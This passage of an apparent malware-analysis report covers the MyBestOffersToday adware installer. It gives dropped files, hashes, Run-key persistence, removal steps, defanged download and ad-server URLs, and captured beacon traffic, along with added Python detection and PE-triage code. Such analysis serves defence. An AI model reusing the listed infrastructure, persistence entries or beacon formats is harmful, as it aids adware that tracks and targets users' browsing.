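SAMPLE_EVENTS = [
    r"PROC|400|1|C:\WINDOWS\explorer.exe",
    r"PROC|668|400|C:\Documents and Settings\user\Desktop\97c94f7678fa89eb87858f8e5a7c13ab.exe",
    rf"PROC|1680|668|{T}\is-8Q7DH.tmp\97c94f7678fa89eb87858f8e5a7c13ab.tmp",
    rf"PROC|1948|1680|{T}\is-HE87O.tmp\setup.exe",
    rf"PROC|1896|1948|{T}\is-5BNLS.tmp\setup.tmp",
    r"PROC|3000|1896|C:\WINDOWS\system32\cmd.exe",
    r"PROC|1928|3000|C:\WINDOWS\system32\tasklist.exe",
    r"PROC|320|3000|C:\WINDOWS\system32\taskkill.exe",
    r"PROC|1200|400|C:\WINDOWS\system32\tasklist.exe",   # benign: an admin running it from Explorer
    r"REG|1896|HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|mbot_ca_014010265|C:\Program Files\mbot_ca_014010265\mbot_ca_014010265.exe",
    r"REG|1092|HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|upmbot_ca_014010265.exe|C:\Documents and Settings\user\Local Settings\Application Data\mbot_ca_014010265\upmbot_ca_014010265.exe -runhelper",
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.rule}] pid {f.pid}: {f.detail}")
```

Rule 1 walks the ancestry rather than checking the direct parent because Inno Setup scripts usually reach tasklist/taskkill through cmd.exe (the dropped .cmd/.bat files). Rule 2 deliberately lets the %Program Files% Run entry through: a Run value is only interesting on its own when it points somewhere an unprivileged user can overwrite.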
Dropped PE files
MD5 | File path |
---|---|
2fdd98650bb540f9fac1fe0a62a0b990 | c:\Documents and Settings\%CurrentUserName%\Local Settings\Application Data\mbot_ca_014010265\upmbot_ca_014010265.exe |
7305c34a9b7b27fe1fe64c4f2d50381e | c:\Program Files\mbot_ca_014010265\mbot_ca_014010265 - uninstall.exe |
11cd6c758e7a66bd126f2bf8658eb59b | c:\Program Files\mbot_ca_014010265\mbot_ca_014010265.exe |
989a9919e922f52086201ddfeabd3c2b | c:\Program Files\mbot_ca_014010265\mybestofferstoday_widget.exe |
3044176a198d1c94e6b18cb7ef10b302 | c:\Program Files\mbot_ca_014010265\predm.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager). Note that taskkill.exe and tasklist.exe are the Windows utilities of those names, run during installation; they are not dropped files and do not need to be deleted:
taskkill.exe:320
taskkill.exe:1336
taskkill.exe:2044
97c94f7678fa89eb87858f8e5a7c13ab.tmp:1680
tasklist.exe:1928
tasklist.exe:364
upmbot_ca_014010265.exe:1092
%original file name%.exe:668
mbot_ca_014010265.exe:1736
encrypt.exe:216
encrypt.exe:1260
encrypt.exe:196
encrypt.exe:264
setup.tmp:1896
setup.exe:1948
- Delete the original SpyTool file.
- Delete or disinfect the following files created/modified by the SpyTool:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O9YZOXQZ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KH2NKL2Z\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S5Q3CH2Z\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp\idp.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ODABS1EF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp\setup.exe (657385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\mbot_ca_014010265\upmbot_ca_014010265.cyl (428 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (231 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (182 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-8Q7DH.tmp\97c94f7678fa89eb87858f8e5a7c13ab.tmp (3780 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\mbot_ca_014010265\mbot_ca_014010265\1.10\cnf.cyl (269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\upmbot_ca_014010265.exe (16609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mbot_ca_014010265.exe (20237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mybestofferstoday_widget.exe (16649 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\predm.exe (3300 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\encrypt.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mbot_ca_014010265.7z (8657 bytes)
%Program Files%\mbot_ca_014010265\is-OP7DE.tmp (28787 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\is-HE4TJ.tmp (4185 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MYBESTOFFERSTODAY\MyBestOffersToday.lnk (837 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\is-HT75P.tmp (7971 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\is-LGPBB.tmp (7433 bytes)
%Program Files%\mbot_ca_014010265\unins000.dat (35465 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\CheckProc.cmd (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\upmbot_ca_014010265.7z (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\is-61C0M.tmp (8657 bytes)
%Program Files%\mbot_ca_014010265\mbot_ca_014010265.exe (29430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\idp.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\mbot_ca_014010265\upmbot_ca_014010265.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\is-6DL8S.tmp (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mybestofferstoday_widget.7z (7971 bytes)
%Program Files%\mbot_ca_014010265\mybestofferstoday_widget.exe (23404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\predm.7z (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\ex.bat (1564 bytes)
%Program Files%\mbot_ca_014010265\predm.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5BNLS.tmp\setup.tmp (6319 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upmbot_ca_014010265.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\mbot_ca_014010265\upmbot_ca_014010265.exe -runhelper"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"mbot_ca_014010265" = "%Program Files%\mbot_ca_014010265\mbot_ca_014010265.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name:
Product Name: MyBestOffersToday
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description: MyBestOffersToday Setup
Comments: This installation was built with Inno Setup.
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 40240 | 40448 | 4.59679 | c3bd95c4b1a8e5199981e0d9b45fd18c |
DATA | 45056 | 592 | 1024 | 1.90742 | 1ee71d84f1c77af85f1f5c278f880572 |
BSS | 49152 | 3724 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 53248 | 2384 | 2560 | 3.07115 | bb5485bf968b970e5ea81292af2acdba |
.tls | 57344 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 61440 | 24 | 512 | 0.14174 | 9ba824905bf9c7922b6fc87a38b74366 |
.reloc | 65536 | 2244 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 69632 | 11264 | 11264 | 3.14703 | 86384a97e0453cb56499ecc334d6f61b |
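The section table explains the apparent contradiction between the "Entropy: Packed" verdict in the summary and the low per-section entropies here (CODE at 4.6 bits per byte, nothing above that). Summing the Raw Size column gives 55,808 bytes, against a 385,387-byte file: roughly 328 KB sits outside every section as an overlay, which is where an Inno Setup stub carries its compressed payload. The following is an added example, not code from the report or from the analysed software, that reproduces the table's columns from a PE file, measures the overlay and applies that distinction. The PE it builds and scans is a constructed minimal sample, not the file described on this page.

```python
import math
import struct


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 for empty input, 8.0 max)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(data: bytes) -> list:
    """Walk the section table of a PE32/PE32+ image and return one record per
    section with the same columns as the table above (entropy is of the raw bytes)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                        # IMAGE_FILE_HEADER follows the signature
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + size_of_optional       # IMAGE_SECTION_HEADER array, 40 bytes each
    sections = []
    for i in range(num_sections):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, table + i * 40)
        raw = data[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "raw_ptr": raw_ptr, "raw_size": raw_size,
            "entropy": round(shannon_entropy(raw), 5),
        })
    return sections


def overlay_info(data: bytes) -> dict:
    """Bytes after the last section's raw data: the overlay where Inno Setup and
    similar installers append their compressed payload."""
    end = max((s["raw_ptr"] + s["raw_size"] for s in pe_sections(data)), default=0)
    overlay = data[end:]
    return {"offset": end, "size": len(overlay), "entropy": round(shannon_entropy(overlay), 5)}


def triage(data: bytes) -> str:
    """Coarse verdict: 'packed-sections' if any section is near-random,
    'installer-overlay' if the sections are plain but most of the file is a
    high-entropy overlay, else 'plain'."""
    if any(s["entropy"] > 7.0 for s in pe_sections(data)):
        return "packed-sections"
    ov = overlay_info(data)
    if ov["size"] > len(data) // 2 and ov["entropy"] > 7.0:
        return "installer-overlay"
    return "plain"


def build_sample_pe() -> bytes:
    """Constructed sample (not the file analysed on this page): a minimal PE32 with
    one low-entropy CODE section and a 2 KiB overlay of uniformly distributed bytes."""
    code = b"\x90" * 200 + b"\xc3" + b"\x00" * 311           # 512 bytes, very repetitive
    overlay = bytes(range(256)) * 8                           # 2048 bytes, entropy exactly 8.0
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    size_of_optional = 0xE0                                   # PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, size_of_optional, 0x0102)
    optional = struct.pack("<H", 0x10B).ljust(size_of_optional, b"\0")   # magic only, rest zero
    headers_end = e_lfanew + 4 + 20 + size_of_optional + 40
    raw_ptr = (headers_end + 0x1FF) & ~0x1FF                  # next 512-byte file boundary
    section = struct.pack("<8sIIIIIIHHI", b"CODE", len(code), 0x1000, len(code), raw_ptr,
                          0, 0, 0, 0, 0x60000020)
    image = (dos + b"PE\0\0" + coff + optional + section).ljust(raw_ptr, b"\0") + code
    return image + overlay


if __name__ == "__main__":
    sample = build_sample_pe()
    for s in pe_sections(sample):
        print(f"{s['name']:<8} va={s['va']:#x} raw={s['raw_size']} entropy={s['entropy']}")
    print("overlay:", overlay_info(sample), "verdict:", triage(sample))
```

For a real sample, `triage(open(path, "rb").read())` gives the verdict; `pe_sections` on the file described here should reproduce the Raw Size and Entropy columns above (the MD5 column is `hashlib.md5` over the same raw slice), and `overlay_info` is what to hand to an Inno Setup unpacker.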
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 163
2b7b7a52efe8396b0216f4a05260ef2d
9d284e9fed9955f910eef1ae7287159d
2f9e864b52474c400bd02edce6a5810a
5932f9c130120565222b600225023e41
7059a51294e236d4fc52cd0e424241bf
4bfd0d9d96cea895041cdf4b1e654631
66b59b5cb4eb3b9f42fb05d650abf687
956c81b158d392a57c94cc58b1d9b96b
c84ece819a6175620d08eacc6851084d
2331123d3fc0308c0bc5c576566ded63
aae70780f303d40607f55afe6c40671d
e5996e0b5bdeae2492661b82c41ed663
c5ea6329994c08a6947bc53a8d7f468c
9e3305071b41c395fa799af6533f7a9c
610ed4fbad849e51346d035c8f0af609
db7804c6c3b9bddaee87754eeb036518
be41f2a70019f8d54dbf1f3ad7c6f76d
53e82bc5fee2ad1a1f2751287d719811
f70c244a1965e12409fcced19c0f23da
a10d93a8f5ecb7a4affff17751521a6d
d8478b37b2f855b5435090b481cbdf0c
1a2c205f9b6a6905620d3c462c7babc8
253c1c04e27a5fe49c4dabaefe94773a
c41947ad52f30f0423cbd088be9956a1
242b1a149e8945fe47933f0c677afff0
Network Activity
URLs
URL | IP |
---|---|
hxxp://dl.tuto4pc.com/download/trasgo/amonetize/ca/setup_mbot_ca.exe | |
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US | 37.187.146.33 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=255559&tag=CA_AMONETIZE_INSTALL_INI | 188.165.231.87 |
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi | 37.187.146.33 |
hxxp://ads.under-myscreen.be/cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc | 37.187.152.38 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=255559&tag=CA_AMONETIZE_INSTALL_F11 | 188.165.231.87 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=255559&tag=CA_AMONETIZE_INSTALL_FIN | 188.165.231.87 |
hxxp://dl.tcoupichou.eu/download/trasgo/amonetize/ca/setup_mbot_ca.exe | 188.165.230.78 |
hxxp://prof.youandmeandmeandyouhihi.com/cgi-bin/get_protect.cgi | 37.187.148.123 |
upd.adskyforever.com | 37.187.147.141 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=255559&tag=CA_AMONETIZE_INSTALL_FIN HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 12 Mar 2016 21:12:25 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Sat, 12 Mar 16 21:12:00 GMT
Set-Cookie: _c4aid=220D4706AE854B09B81F07469B850CB9; expires=Thu, 08 Sep 16 21:12:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=220D4706AE854B09B81F07469B850CB9,1457817145.99322; expires=Thu, 08 Sep 16 21:12:00 GMT; domain=regiedepub.com
GET /cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc HTTP/1.1
User-Agent: mbot_ca_014010265-1.10
Host: ads.under-myscreen.be
Accept: */*
Accept-Encoding: gzip, deflate
Referer:
Cookie:
Accept-Language: en,en-US
X-Guuid: 75ed9567-aa58-4c8e-a8ea-3cad7c47ab03
X-OS-Ver: 5.1.2.2600
HTTP/1.1 200 OK
Date: Sat, 12 Mar 2016 21:12:23 GMT
Server: Apache/2.2.22 (Debian) mod_ssl/2.2.22 OpenSSL/1.0.1e mod_wsgi/3.3 Python/2.7.3 mod_perl/2.0.7 Perl/v5.14.2
X-C4PC-ServerName: ads.under-myscreen.be
Set-Cookie: _c4aid=75ED9567AA584C8EA8EA3CAD7C47AB03; expires=Thu, 08 Sep 16 21:12:00 GMT; domain=under-myscreen.be; path=/;
Set-Cookie: _c4aid2=75ED9567AA584C8EA8EA3CAD7C47AB03,1457817143.84413; expires=Thu, 08 Sep 16 21:12:00 GMT; domain=under-myscreen.be; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
34d..{"dids":{"90077":{"unmatch":["regiedepub.com|directrev.com|under-myscreen.be|eorezo.com|regiedepub.com"],"match":[{"u":0,"m":"pinterest|apple|ask|microsoft|bmo|wordpress|cibc|paypal|baidu|cbc"},{"u":0,"m":"xvideos|imbd|instagram|netflix|craigslist|kickass|td|thepiratebay"},{"u":0,"m":"yahoo|live|wikipedia|bing|msn|amazon|tumblr|royalbank|reddit|ebay"},{"u":0,"m":"youtube|yahoo|live|wikipedia|bing|msn|amazon|tumblr|royalbank|reddit"},{"u":0,"m":"xhamster|http|fa|go|yah|hot|twit|blog|msn|apple|facebook|google|twitter"},{"u":0,"m":"xhamster"},{"u":0,"m":"pinterest|apple|ask|microsoft|bmo|wordpress|cibc|paypal|baidu|cbc"},{"u":0,"m":"ebay|xvideos|imbd|instagram|netflix|craigslist|kickass|td|thepiratebay"},{"u":0,"m":"http|fa|go|yah|hot|twit|blog|msn|apple|facebook|google|twitter|youtube"}]}},"freeze":3600,"refresh":3600,"version":118285}..0..
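The getkws.cgi body above is a keyword configuration fetched by the dropped mbot_ca component (note its own User-Agent and the X-Guuid / X-OS-Ver headers). The following added example, which is not part of the report or of the analysed software, parses that body and applies its rules to URLs. The semantics are an assumption drawn from the field names: "unmatch" holds the operator's own ad domains to exclude, and each "match" entry is a regex alternation selecting pages on which to act. Whatever the exact use, the alternations include tokens such as "td", "go", "fa" and the literal "http", so the configuration fires on practically every URL; the example surfaces those tokens.

```python
import json
import re
import urllib.parse

# Excerpt of the getkws.cgi response body shown above, with the HTTP chunk framing
# ("34d.." / "..0..") removed so that it parses as JSON. Only three of the nine
# "match" entries are kept; the structure is otherwise unchanged.
GETKWS_BODY = r'''{"dids":{"90077":{"unmatch":["regiedepub.com|directrev.com|under-myscreen.be|eorezo.com|regiedepub.com"],"match":[{"u":0,"m":"pinterest|apple|ask|microsoft|bmo|wordpress|cibc|paypal|baidu|cbc"},{"u":0,"m":"xvideos|imbd|instagram|netflix|craigslist|kickass|td|thepiratebay"},{"u":0,"m":"http|fa|go|yah|hot|twit|blog|msn|apple|facebook|google|twitter|youtube"}]}},"freeze":3600,"refresh":3600,"version":118285}'''


def load_rules(body: str) -> dict:
    """Compile the per-DID rule sets: each 'm' string is a regex alternation."""
    doc = json.loads(body)
    rules = {}
    for did, entry in doc["dids"].items():
        rules[did] = {
            "unmatch": [re.compile(p, re.IGNORECASE) for p in entry.get("unmatch", [])],
            "match": [(m.get("u"), re.compile(m["m"], re.IGNORECASE)) for m in entry.get("match", [])],
            "refresh": doc.get("refresh"),
        }
    return rules


def classify_url(rules: dict, did: str, url: str) -> str:
    """Apply one DID's rules to a URL. Assumed semantics (not stated on the page):
    'unmatch' excludes the operator's own ad domains, 'match' selects pages where
    keyword/ad content is injected. Returns 'excluded', 'target' or 'ignored'."""
    host = urllib.parse.urlsplit(url).hostname or ""
    r = rules[did]
    if any(p.search(host) for p in r["unmatch"]):
        return "excluded"
    if any(p.search(url) for _, p in r["match"]):
        return "target"
    return "ignored"


def overbroad_tokens(rules: dict, did: str) -> set:
    """Alternatives that will match almost any URL: three characters or fewer, or the
    literal 'http'. A large set here means the config targets practically every page."""
    tokens = set()
    for _, pattern in rules[did]["match"]:
        for alt in pattern.pattern.split("|"):
            if len(alt) <= 3 or alt == "http":
                tokens.add(alt)
    return tokens


if __name__ == "__main__":
    rules = load_rules(GETKWS_BODY)
    for u in ("http://ads.regiedepub.com/cgi-bin/advert/settags",
              "https://www.paypal.com/signin",
              "https://example.org/",
              "ftp://example.org/"):
        print(f"{classify_url(rules, '90077', u):<9} {u}")
    print("over-broad tokens:", sorted(overbroad_tokens(rules, "90077")))
```

The "refresh"/"freeze" values (3600 s) give the polling interval to expect from an infected host, which is the number to use when hunting for this beacon in proxy logs.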
GET /cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: prof.eorezo.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 12 Mar 2016 21:12:18 GMT
Server: Apache/2.2.22
x-eorezo-crc32: -1
x-eorezo-crypted: 1
x-eorezo-length: 632
Set-Cookie: conftime=1457817138; expires=Thu, 06 Jul 16 14:58:00 GMT; domain=eorezo.com; path=/;
Set-Cookie: EoRezo=194.242.96.218.1457817138770161; path=/; expires=Mon, 11-Apr-16 21:12:18 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
358..Xg8nssf/4H10OdRv/PBlQCyF9RkAzpy/PPG8paJnu rCw3mAaqFpX2 ZKEgbMMA2htCshaMIPoMPkSppoNIfvqD ZyWxTIl1LyUx8yWjlHHNhn1WF5uF0H6qLM uZMwkTiGldZX5iSj uCsroOrbj/qdFgfbU9hmNOF2lZWiRA4D1nmKWD56o30N03aMe cM TaH0Zt8tkkpVIrV86sjShA2ibI4frmimtvqttCmZq2iOlFsKeYNJxrj/jP12cx2lA7NiBrk4PKXXug7tpKb65atNqDRlvUKKAF9c9zPzn4F2eh8GAfVbPOtZhSf/o/50RLSfemcISdhtiO8gTINReeSoYdUAqhmbrscZPjwnJCjKfgrUbQCV1J0DBwv2J mQsGJZQH4xDticU8Aw3zUoh3vFhu1Wg3CUqlkPjaoTHyfoXpQMPgXLOCXbzPycQALj/NcItWUUrMNRe kdxupcE1jN4IzWnf18j9K22lWOLNAxMrPXujOAPP62LFEXRprTnccE4UideNhUT6DZiskWqf r0XSAkp94qxjVd0han4yoYTsCe73I6nVdoolp8ZVRkkPBXhF4j0HnxGK7gNIlCPG9CPWv3omojAUMA/b1D0QyJmrJXkW4wDQZDG70ubUzvxaL8e7tIXGaOPoNaaawcsncgjizZ4iLzFWuT7SqAme snGMZyD25HDIX85w1NDBG/7j7KXONYkUsLgo0muKS18VS3O815AXMRvhUqrsNbIl14wyH2HdK2Y6rOdediRY/mUWwpxc4SIFGJvBzItOLGyenMOutfgI/PzuVUWr5spHZWUtnBhgucXvuMx85rof39lP/XE5KUbGoqL6Aeb3w==..0..
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=255559&tag=CA_AMONETIZE_INSTALL_INI HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 12 Mar 2016 21:12:18 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Sat, 12 Mar 16 21:12:00 GMT
Set-Cookie: _c4aid=D3B79603FC7E4A9C8FB98F925370E2BE; expires=Thu, 08 Sep 16 21:12:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=D3B79603FC7E4A9C8FB98F925370E2BE,1457817138.92826; expires=Thu, 08 Sep 16 21:12:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 255559);......0..
POST /cgi-bin/get_protect.cgi HTTP/1.1
x-spidermessenger-crypted: 2
x-spidermessenger-crc32: 2055166265
x-spidermessenger-length: 275
Content-Type: text/*
User-Agent: mbot_ca_014010265-mbot_ca_014010265
Host: prof.youandmeandmeandyouhihi.com
Content-Length: 382
Cache-Control: no-cache
ujXl2iaEv3+xg2nmk5XqjNFxudZ4eC/dyLKVClDHrgytgp9na1YznA1k2sbSq1rpblkEa9ZKaQ1Wwn4SmwElJXtSv7LRCE910ON1TEZkOpikVPs0NmG6pauUOoeVJSuD7bwT6xVPl/Q9wAnpz8090A7JYzEPa4dTn2lAvm4etvM/lgFyGw7qg5HsoRIQ5jkHm1Hj6TME+Z22i4XCGD7auQF8GDqKXkss9k7NBp99DMsAIWRpNtN4zLe9JkOz4rsIjlMqZxuWf+eZ1OGoqjLBfAMnuAoebFSON424/gL2okjLce3ejQZwj3JPlFBhztqC6fQ7XEPW+mE5ErzKDmOdJWdL4mIadPxmZkcP1P9WOKo=
HTTP/1.1 200 OK
Date: Sat, 12 Mar 2016 21:12:23 GMT
Server: Apache/2.2.22
x-SPIDERMESSENGER-crypted: 2
x-SPIDERMESSENGER-length: 1983
x-SPIDERMESSENGER-crc32: -1
Set-Cookie: conftime=1457817143; expires=Thu, 06 Jul 16 14:59:00 GMT; domain=youandmeandmeandyouhihi.com; path=/;
Set-Cookie: EoRezo=194.242.96.218.1457817143574585; path=/; expires=Mon, 11-Apr-16 21:12:23 GMT
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
a60..0NogVEVNeZU/g6fcxXpPm8L/TbLACp6qNZeGXV8m6ec/K8dk0/yY5pa2OZ8Vz3njZHd9v29yzT3I48VojCBBmA2s0/SxoZIOAAhT SK4vV7sDhBM0aTmg2 IVnRKydYHunoaf9pbRw2 G5ivu0QKWc3/l WPP1gNlgnspvbmqk4aS7ehZBwwMTOxZSE84DysrG8f3S hIgVSAINyXu9s UPJeM98UAjt6p7fBFT6zMtkh 3j1ETePa4NR6v5nTfw5XqoE1sK6iaLoC4VpThhXFImxqo8kWLg41HIXBDHRdF950YBd00yrMS//vftM2BgU2lwIGKjVkNlmY0QWivyhi c6FkNLk8qwrEs/rFNjOmDaAErIlj KNtqGnUkY e6D3O/1/I 8DpBydFoBJ91LdZab/WrBBbIHR0mgEkJTQoBXjm/T 2a3azIWpikcxx30rHKp0xFBPgCNjxJhe5w0Mo4JSA6v8dx n8bBc8fcjovYnaZwRkR7UwhT7Vghxy9eoX6xpvq6DDXUXVc8AdbR7pqgyB0IzeZHlMtG rwrTylkciy9hcS4rZSwcRo9g6KSHmtXVZb2lVLgiFX3oaPopPdfYG6vA0GJsxeq6zf7EIcicRfC4KZzM4J7Ro6YbwlJP6RUDNbYNqz6so6qAo0CMoZ6LbE1zBLIYOXmrFd9EwbmDZiOAZCl2GK/de/irxXmNOW5WoMLOeZ3Rxv3/uhb jSBoVDkznDGJCknuGV/kmP rrjbuI5qTWlAs34aUItH2qjEEeW1Jioq2puQuFKpKOrQTcG4TQZ9VPZlf8IuP qkA5lolo8h0g3BJrdVyPNGvrAHVEgE2lLNmk3L6cFd1kiGIF8A4VHdQ9FlhlrSUcb6rq9n1/NQsHwsUwialxOcXHmybteAi1KTH4d9lbKNXkBEUb6pBlo4S7/OccM0c4q5GjewekIcMqEUm0BoMPcBoJhM9EwnNgmTX IiF1psW05lxUOV50wzEAPZI63kEUwSrWEWXBaXClEF3/43Gi5QN3ek77Yng9Eu0TbbDwAIUDuBKXeF5NL5Xq5VPXPkAPREGqZnF9paybsZJK7DCapPWXLwNzYa5IGlsUC6MLp9ljxedAEFRvOgUMQXj0QfMe8eWGVGCCHFrwSsqDnx9FF/rqGAA6wYRUWllQ1lVJNtxiAVCY8/2o0N0llGnJ5VZOlKfUYdLL1Hg/OQnRYmqMtmdh28VLW/zYklZfD6aTL186Hz7h3LK2vj75hTKbiRdqpH6SFwzFNgku qd1pjmbmCU77SmPeYVNOfqjNczNaxagN0QnalCBBl/ghWP92SU2/zc4JjtDA6EHZR7/yoOOF/15s4Vr9woTzL/Wrjd F5uxawMNxDeZ7cJ2Nf0n8V12KzWu5TLcbRf 